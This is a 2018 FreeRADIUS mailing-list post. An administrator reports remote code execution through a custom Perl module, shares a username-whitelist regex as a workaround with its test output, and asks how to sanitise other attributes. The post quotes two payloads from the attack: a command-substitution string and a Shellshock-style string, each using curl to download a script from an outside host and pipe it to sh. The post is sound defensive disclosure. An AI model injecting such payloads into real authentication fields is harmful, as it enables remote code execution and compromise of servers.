Remote code execution vulnerability via Perl module
David Herselman
dhe at syrex.co
Tue Jul 3 13:44:07 CEST 2018
Hi,
We had upgraded our infrastructure to FreeRADIUS 2.2.10 due to us receiving a growing number of authentication requests, starting Fri Jun 29 00:48:59 (GMT), which result in FreeRADIUS downloading and executing code.
Transmitting the following username results in a custom perl module executing the code:
$(/usr/bin/curl v.kernelupgr.com/d/all|sh)
We have observed another variant of this, which didn't appear to affect us:
() { :;}; /usr/bin/curl v.kernelupgr.com/d/all|sh
We've been able to work around the problem by placing the following code near the beginning of our Perl module:
if ($RAD_REQUEST{'User-Name'} !~ /^[[:alnum:]._-]+$/) { return RLM_MODULE_NOTFOUND; };
Any suggestions regarding possibly cleaning other attributes which may result in code execution on the following line?
&radiusd::radlog(1, "RAD_REQUEST: $_ = $RAD_REQUEST{$_}");
Testing:
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u-s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
OK
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u\\s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
BAD
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
BAD
[davidh at zatjnb01-radius1 ~]# perl -le 'print "u\(s_e.r" !~ /^[[:alnum:]._-]+$/ ? "BAD" : "OK"'
BAD
Regards
David Herselman
More information about the Freeradius-Users
mailing list